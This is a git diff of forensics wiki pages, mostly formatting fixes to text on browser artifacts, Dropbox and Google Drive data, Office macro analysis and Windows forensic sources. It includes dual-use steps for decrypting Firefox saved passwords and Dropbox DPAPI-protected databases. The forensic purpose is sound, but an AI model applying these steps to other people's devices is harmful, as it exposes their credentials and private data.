-* _**places.sqlite**_ : History (moz_\__places), bookmarks (moz_bookmarks), and downloads (moz_\__annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used to read the history inside _**places.sqlite**_.
-  * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` 
+* _**places.sqlite**_ : History (moz_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\__annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_.
+  * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;`&#x20;
     * Note that the link type is a number that indicates:
       * 1: User followed a link
       * 2: User wrote the URL
@@ -44,14 +44,14 @@ Inside the folder **of each profile **(_\~/.mozilla/firefox/\<ProfileName>/_) pa
   * Query to dump downloads: `SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;`
   *
 * _**bookmarkbackups/**_ : Bookmarks backups
-* _**formhistory.sqlite**_ : **Web form data **(like emails)
+* _**formhistory.sqlite**_ : **Web form data** (like emails)
 * _**handlers.json**_ : Protocol handlers (like, which app is going to handle _mailto://_ protocol)
 * _**persdict.dat**_ : Words added to the dictionary
-* _**addons.json**_ and _**extensions.sqlite** _: Installed addons and extensions
-* _**cookies.sqlite**_ : Contains **cookies. **[**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html)** **can be used in Windows to inspect this file.
-*   _**cache2/entries**_ or _**startupCache **_: Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html) can be used to see the **files saved in the cache**.
+* _**addons.json**_ and _**extensions.sqlite** _ : Installed addons and extensions
+* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) **** can be used in Windows to inspect this file.
+*   _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**.
 
-     Information that can be obtained:
+    &#x20;Information that can be obtained:
 
     * URL, fetch Count, Filename, Content type, FIle size, Last modified time, Last fetched time, Server Last Modified, Server Response
 * _**favicons.sqlite**_ : Favicons
@@ -59,11 +59,11 @@ Inside the folder **of each profile **(_\~/.mozilla/firefox/\<ProfileName>/_) pa
 * _**downloads.sqlite**_ : Old downloads database (now it's inside places.sqlite)
 * _**thumbnails/**_ : Thumbnails
 * _**logins.json**_ : Encrypted usernames and passwords
-* **Browser’s built-in anti-phishing: **`grep 'browser.safebrowsing' ~/Library/Application Support/Firefox/Profiles/*/prefs.js`
+* **Browser’s built-in anti-phishing:** `grep 'browser.safebrowsing' ~/Library/Application Support/Firefox/Profiles/*/prefs.js`
   * Will return “safebrowsing.malware.enabled” and “phishing.enabled” as false if the safe search settings have been disabled
 * _**key4.db**_ or _**key3.db**_ : Master key ?
 
-In order to try to decrypt the master password you can use [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
+In order to try to decrypt the master password you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\
 With the following script and call you can specify a password file to bruteforce:
 
 {% code title="brute.sh" %}
@@ -83,10 +83,10 @@ done < $passfile
 
 ## Google Chrome
 
-Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in _**/Users/$USER/Library/Application Support/Google/Chrome/** _(MacOS).\
+Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in _**/Users/$USER/Library/Application Support/Google/Chrome/** _ (MacOS).\
 Most of the information will be saved inside the _**Default/**_ or _**ChromeDefaultData/**_ folders inside the paths indicated before. Inside here you can find the following interesting files:
 
-* _**History **_: URLs, downloads and even searched keywords. In Windows you can use the tool [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) to read the history. The "Transition Type" column means:
+* _**History**_ : URLs, downloads and even searched keywords. In Windows you can use the tool [ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html) to read the history. The "Transition Type" column means:
   * Link: User clicked on a link
   * Typed: The url was written
   * Auto Bookmark
@@ -94,23 +94,23 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa
   * Start page: Home page
   * Form Submit: A form was filled and sent
   * Reloaded
-* _**Cookies **_: Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) can be used to inspect the cookies.
-* _**Cache **_: Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) to inspect the ca
-* _**Bookmarks **_:** ** Bookmarks 
+* _**Cookies**_ : Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) can be used to inspect the cookies.
+* _**Cache**_ : Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) to inspect the ca
+* _**Bookmarks**_ : **** Bookmarks&#x20;
 * _**Web Data**_ : Form History
-* _**Favicons **_: Favicons
+* _**Favicons**_ : Favicons
 * _**Login Data**_ : Login information (usernames, passwords...)
 * _**Current Session**_ and _**Current Tabs**_ : Current session data and current tabs
 * _**Last Session**_ and _**Last Tabs**_ : These files hold sites that were active in the browser when Chrome was last closed.
 * _**Extensions/**_ : Extensions and addons folder
 * **Thumbnails** : Thumbnails
 * **Preferences**: This file contains a plethora of good information such as plugins, extensions, sites using geolocation, popups, notifications, DNS prefetching, certificate exceptions, and much more. If you’re trying to research whether or not a specific Chrome setting was enabled, you will likely find that setting in here.
-* **Browser’s built-in anti-phishing: **`grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
+* **Browser’s built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
   * You can simply grep for “**safebrowsing**” and look for `{"enabled: true,"}` in the result to indicate anti-phishing and malware protection is on.
 
 ## **SQLite DB Data Recovery**
 
-As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to** recover deleted entries using the tool **[**sqlparse**](https://github.com/padfoot999/sqlparse)** or **[**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
+As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
 
 ## **Internet Explorer 11**
 
@@ -119,7 +119,7 @@ Internet Explorer stores **data** and **metadata** in different locations. The m
 The **metadata** can be found in the folder`%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` where VX can be V01, V16 o V24.\
 In the previous folder you can also find the file V01.log. In case the **modified time** of this file and the WebcacheVX.data file **are different** you may need to run the command `esentutl /r V01 /d` to **fix** possible **incompatibilities**.
 
-Once **recovered** this artifact (It's an ESE database, photorec can recover it with the options Exchange Database or EDB) you can use the program [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it.\
+Once **recovered** this artifact (It's an ESE database, photorec can recover it with the options Exchange Database or EDB) you can use the program [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it.\
 Once **opened**, go to the table "**Containers**".
 
 ![](<../../../.gitbook/assets/image (446).png>)
@@ -130,7 +130,7 @@ Inside this table you can find in which other tables or containers each part of
 
 ### Cache
 
-You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date.
+You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date.
 
 #### Metadata
 
@@ -147,7 +147,7 @@ The metadata information about the cache stores:
 
 #### Files
 
-The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ 
+The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_&#x20;
 
 The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS).
 
@@ -169,7 +169,7 @@ The metadata information about the cookies stores:
 
 #### Files
 
-The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ 
+The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_&#x20;
 
 Session cookies will reside in memory and persistent cookie in the disk.
 
@@ -177,7 +177,7 @@ Session cookies will reside in memory and persistent cookie in the disk.
 
 #### **Metadata**
 
-Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) you can find the container with the metadata of the downloads:
+Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) you can find the container with the metadata of the downloads:
 
 ![](<../../../.gitbook/assets/image (445).png>)
 
@@ -189,7 +189,7 @@ Look in the path _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHi
 
 ### **History**
 
-The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used to read the history. But first you need to indicate the browser in advanced options and the location of the extracted history files.
+The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history. But first you need to indicate the browser in advanced options and the location of the extracted history files.
 
 #### **Metadata**
 
@@ -199,7 +199,7 @@ The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_vi
 
 #### **Files**
 
-Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5 **_and  _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_
+Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and  _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_
 
 ### **Typed URLs**
 
@@ -212,19 +212,19 @@ This information can be found inside the registry NTDUSER.DAT in the path:
 
 ## Microsoft Edge
 
-For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section (IE 11) remain valid **with the only difference that the base locating in this case is _**%userprofile%\Appdata\Local\Packages**_ (as can be observed in the following paths):
+For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section (IE 11) remain valid** with the only difference that the base locating in this case is _**%userprofile%\Appdata\Local\Packages**_ (as can be observed in the following paths):
 
-* Profile Path: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC**_
+* Profile Path: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC**_
 * History, Cookies and Downloads: _**C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat**_
-* Settings, Bookmarks, and Reading List: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb**_
-* Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache**_
-* Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_
+* Settings, Bookmarks, and Reading List: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb**_
+* Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC#!XXX\MicrosoftEdge\Cache**_
+* Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_
 
 ## **Safari**
 
 The databases can be found in `/Users/$User/Library/Safari`
 
-* **History.db**: The tables `history_visits`_ and _`history_items` contains information about the history and timestamps.
+* **History.db**: The tables `history_visits` _and_ `history_items` contains information about the history and timestamps.
   * `sqlite3 ~/Library/Safari/History.db "SELECT h.visit_time, i.url FROM history_visits h INNER JOIN history_items i ON h.history_item = i.id"`
 * **Downloads.plist**: Contains the info about the downloaded files.
 * **Book-marks.plis**t: URLs bookmarked.
@@ -236,7 +236,7 @@ The databases can be found in `/Users/$User/Library/Safari`
   * `plutil -p ~/Library/Safari/UserNotificationPermissions.plist | grep -a3 '"Permission" => 1'`
 * **LastSession.plist**: Tabs that were opened the last time the user exited Safari.
   * `plutil -p ~/Library/Safari/LastSession.plist | grep -iv sessionstate`
-* **Browser’s built-in anti-phishing: **`defaults read com.apple.Safari WarnAboutFraudulentWebsites`
+* **Browser’s built-in anti-phishing:** `defaults read com.apple.Safari WarnAboutFraudulentWebsites`
   * The reply should be 1 to indicate the setting is active
 
 ## Opera
@@ -245,5 +245,5 @@ The databases can be found in `/Users/$USER/Library/Application Support/com.oper
 
 Opera **stores browser history and download data in the exact same format as Google Chrome**. This applies to the file names as well as the table names.
 
-* **Browser’s built-in anti-phishing: **`grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
-  * **fraud_protection_enabled** should be **true**
+* **Browser’s built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
+  * **fraud\_protection\_enabled** should be **true**
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 5ceb9b4e..3cf38453 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -19,7 +19,7 @@ Once you have found the CID it's recommended to **search files containing this I
 ## Google Drive
 
 In Widows you can find the main Google Drive folder in `\Users\<username>\AppData\Local\Google\Drive\user_default`\
-This folder contains a file called Sync_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files...\
+This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files...\
 Even deleted files appears in that log file with it's corresponding MD5.
 
 The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**\
@@ -56,16 +56,16 @@ However, the main information is:
 
 Apart from that information, in order to decrypt the databases you still need:
 
-* The** encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
+* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
 * The **`SYSTEM`** and **`SECURITY`** hives
 * The **DPAPI master keys**: Which can be found in `\Users\<username>\AppData\Roaming\Microsoft\Protect`
 * The **username** and **password** of the Windows user
 
-Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:**
+Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
 
 ![](<../../../.gitbook/assets/image (448).png>)
 
-If everything goes as expected, the tool will indicate the** primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
+If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
 
 The resulting hex is the final key used to encrypt the databases which can be decrypted with:
 
@@ -77,21 +77,21 @@ The **`config.dbx`** database contains:
 
 * **Email**: The email of the user
 * **usernamedisplayname**: The name of the user
-* **dropbox_path**: Path where the dropbox folder is located
-* **Host_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
-* **Root_ns**: User identifier
+* **dropbox\_path**: Path where the dropbox folder is located
+* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
+* **Root\_ns**: User identifier
 
 The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
 
-* **Server_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client) .
-* **local_sjid**: Version of the file
-* **local_mtime**: Modification date
-* **local_ctime**: Creation date
+* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client) .
+* **local\_sjid**: Version of the file
+* **local\_mtime**: Modification date
+* **local\_ctime**: Creation date
 
 Other tables inside this database contain more interesting information:
 
-* **block_cache**: hash of all the files and folder of Dropbox
-* **block_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
-* **mount_table**: Share folders of dropbox
-* **deleted_fields**: Dropbox deleted files
-* **date_added**
+* **block\_cache**: hash of all the files and folder of Dropbox
+* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
+* **mount\_table**: Share folders of dropbox
+* **deleted\_fields**: Dropbox deleted files
+* **date\_added**
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 28d4aafb..91b41887 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -2,9 +2,9 @@
 
 ## Introduction
 
-Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros **(VBA scripts). 
+Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts).&#x20;
 
-Broadly speaking, there are two generations of Office file format: the** OLE formats** (file extensions like RTF, DOC, XLS, PPT), and the "**Office Open XML**" formats (file extensions that include DOCX, XLSX, PPTX). **Both** formats are structured, compound file binary formats that **enable Linked or Embedded content** (Objects). OOXML files are actually zip file containers, meaning that one of the easiest ways to check for hidden data is to simply `unzip` the document:
+Broadly speaking, there are two generations of Office file format: the **OLE formats** (file extensions like RTF, DOC, XLS, PPT), and the "**Office Open XML**" formats (file extensions that include DOCX, XLSX, PPTX). **Both** formats are structured, compound file binary formats that **enable Linked or Embedded content** (Objects). OOXML files are actually zip file containers, meaning that one of the easiest ways to check for hidden data is to simply `unzip` the document:
 
 ```
 $ unzip example.docx 
@@ -49,9 +49,9 @@ $ tree
 
 As you can see, some of the structure is created by the file and folder hierarchy. The rest is specified inside the XML files. [_New Steganographic Techniques for the OOXML File Format_, 2011](http://download.springer.com/static/pdf/713/chp%3A10.1007%2F978-3-642-23300-5\_27.pdf?originUrl=http%3A%2F%2Flink.springer.com%2Fchapter%2F10.1007%2F978-3-642-23300-5\_27\&token2=exp=1497911340\~acl=%2Fstatic%2Fpdf%2F713%2Fchp%25253A10.1007%25252F978-3-642-23300-5\_27.pdf%3ForiginUrl%3Dhttp%253A%252F%252Flink.springer.com%252Fchapter%252F10.1007%252F978-3-642-23300-5\_27\*\~hmac=aca7e2655354b656ca7d699e8e68ceb19a95bcf64e1ac67354d8bca04146fd3d) details some ideas for data hiding techniques, but CTF challenge authors will always be coming up with new ones.
 
-Once again, a Python toolset exists for the examination and **analysis of OLE and OOXML documents**: [oletools](http://www.decalage.info/python/oletools). For OOXML documents in particular, [OfficeDissector](https://www.officedissector.com) is a very powerful analysis framework (and Python library). The latter includes a [quick guide to its usage](https://github.com/grierforensics/officedissector/blob/master/doc/html/\_sources/txt/ANALYZING_OOXML.txt).
+Once again, a Python toolset exists for the examination and **analysis of OLE and OOXML documents**: [oletools](http://www.decalage.info/python/oletools). For OOXML documents in particular, [OfficeDissector](https://www.officedissector.com) is a very powerful analysis framework (and Python library). The latter includes a [quick guide to its usage](https://github.com/grierforensics/officedissector/blob/master/doc/html/\_sources/txt/ANALYZING\_OOXML.txt).
 
-Sometimes the challenge is not to find hidden static data, but to **analyze a VBA macro **to determine its behavior. This is a more realistic scenario, and one that analysts in the field perform every day. The aforementioned dissector tools can indicate whether a macro is present, and probably extract it for you. A typical VBA macro in an Office document, on Windows, will download a PowerShell script to %TEMP% and attempt to execute it, in which case you now have a PowerShell script analysis task too. But malicious VBA macros are rarely complicated, since VBA is [typically just used as a jumping-off platform to bootstrap code execution](https://www.lastline.com/labsblog/party-like-its-1999-comeback-of-vba-malware-downloaders-part-3/). In the case where you do need to understand a complicated VBA macro, or if the macro is obfuscated and has an unpacker routine, you don't need to own a license to Microsoft Office to debug this. You can use [Libre Office](http://libreoffice.org): [its interface](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/) will be familiar to anyone who has debugged a program; you can set breakpoints and create watch variables and capture values after they have been unpacked but before whatever payload behavior has executed. You can even start a macro of a specific document from a command line:
+Sometimes the challenge is not to find hidden static data, but to **analyze a VBA macro** to determine its behavior. This is a more realistic scenario, and one that analysts in the field perform every day. The aforementioned dissector tools can indicate whether a macro is present, and probably extract it for you. A typical VBA macro in an Office document, on Windows, will download a PowerShell script to %TEMP% and attempt to execute it, in which case you now have a PowerShell script analysis task too. But malicious VBA macros are rarely complicated, since VBA is [typically just used as a jumping-off platform to bootstrap code execution](https://www.lastline.com/labsblog/party-like-its-1999-comeback-of-vba-malware-downloaders-part-3/). In the case where you do need to understand a complicated VBA macro, or if the macro is obfuscated and has an unpacker routine, you don't need to own a license to Microsoft Office to debug this. You can use [Libre Office](http://libreoffice.org): [its interface](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/) will be familiar to anyone who has debugged a program; you can set breakpoints and create watch variables and capture values after they have been unpacked but before whatever payload behavior has executed. You can even start a macro of a specific document from a command line:
 
 ```
 $ soffice path/to/test.docx macro://./standard.module1.mymacro
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
index e92b8e52..985e71ee 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -16,7 +16,7 @@ This database can be open with a SQLite tool or with the tool [**WxTCmd**](https
 
 ### ADS/Alternate Data Streams
 
-Files downloaded may contain the **ADS Zone.Identifier** indicating **how **was **downloaded **(from the intranet, Internet...) and some software (like browser) usually put even **more** **information **like the **URL **from where the file was downloaded.
+Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** (from the intranet, Internet...) and some software (like browser) usually put even **more** **information** like the **URL** from where the file was downloaded.
 
 ## **File Backups**
 
@@ -45,7 +45,7 @@ These backups are usually located in the `\System Volume Information` from the r
 
 ![](<../../../.gitbook/assets/image (520).png>)
 
-Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
+Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
 
 ![](<../../../.gitbook/assets/image (521).png>)
 
@@ -147,7 +147,7 @@ Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about whe
 The 'Plug and Play Cleanup' scheduled task is responsible for **clearing** legacy versions of drivers. It would appear (based upon reports online) that it also picks up **drivers which have not been used in 30 days**, despite its description stating that "the most current version of each driver package will be kept". As such, **removable devices which have not been connected for 30 days may have their drivers removed**.\
 The scheduled task itself is located at ‘C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup’, and its content is displayed below:
 
-![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
+![](https://2.bp.blogspot.com/-wqYubtuR\_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
 
 The task references 'pnpclean.dll' which is responsible for performing the cleanup activity additionally we see that the ‘UseUnifiedSchedulingEngine’ field is set to ‘TRUE’ which specifies that the generic task scheduling engine is used to manage the task. The ‘Period’ and ‘Deadline’ values of 'P1M' and 'P2M' within ‘MaintenanceSettings’ instruct Task Scheduler to execute the task once every month during regular Automatic maintenance and if it fails for 2 consecutive months, to start attempting the task during.\
 **This section was copied from** [**here**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)**.**
@@ -169,7 +169,7 @@ This application saves the emails in HTML or text. You can find the emails insid
 
 The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
 
-**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. Inside the `Message` table you can see the emails.
+**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails.
 
 ### Microsoft Outlook
 
@@ -217,7 +217,7 @@ It is possible to read this file with the tool [**Thumbsviewer**](https://thumbs
 
 ### Thumbcache
 
-Beginning with Windows Vista, **thumbnail previews are stored in a centralized location on the system**. This provides the system with access to images independent of their location, and addresses issues with the locality of Thumbs.db files. The cache is stored at **`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`** as a number of files with the label **thumbcache_xxx.db** (numbered by size); as well as an index used to find thumbnails in each sized database.
+Beginning with Windows Vista, **thumbnail previews are stored in a centralized location on the system**. This provides the system with access to images independent of their location, and addresses issues with the locality of Thumbs.db files. The cache is stored at **`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`** as a number of files with the label **thumbcache\_xxx.db** (numbered by size); as well as an index used to find thumbnails in each sized database.
 
 * Thumbcache\_32.db -> small
 * Thumbcache\_96.db -> medium
@@ -333,7 +333,7 @@ It gives the information:
 
 This information is updated every 60mins.
 
-You can obtain the date from this file using the tool [**srum_dump**](https://github.com/MarkBaggett/srum-dump).
+You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
 
 ```bash
 .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
@@ -347,13 +347,13 @@ The cache stores various file metadata depending on the operating system, such a
 
 * File Full Path
 * File Size
-* **$Standard_Information** (SI) Last Modified time
+* **$Standard\_Information** (SI) Last Modified time
 * Shimcache Last Updated time
 * Process Execution Flag
 
 This information can be found in the registry in:
 
-* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` 
+* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache`&#x20;
   * XP (96 entries)
 * `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`
   * Server 2003 (512 entries)
@@ -417,7 +417,7 @@ Before Windows Vista the event logs were in binary format and after it, they are
 
 The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
 
-They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com)** or **[**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
+They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
 
 ### Security
 
@@ -460,7 +460,7 @@ The Status and sub status information of the event s can indicate more details a
 
 ### Recovering Windows Events
 
-It's highly recommended to turn off the suspicious PC by **unplugging it** to maximize the probabilities of recovering the Windows Events. In case they were deleted, a tool that can be useful to try to recover them is [**Bulk_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor) indicating the **evtx** extension.
+It's highly recommended to turn off the suspicious PC by **unplugging it** to maximize the probabilities of recovering the Windows Events. In case they were deleted, a tool that can be useful to try to recover them is [**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor) indicating the **evtx** extension.
 
 ## Identifying Common Attacks with Windows Events
 
@@ -478,7 +478,7 @@ This event is recorded by the EventID 4616 inside the Security Event log.
 The following System EventIDs are useful:
 
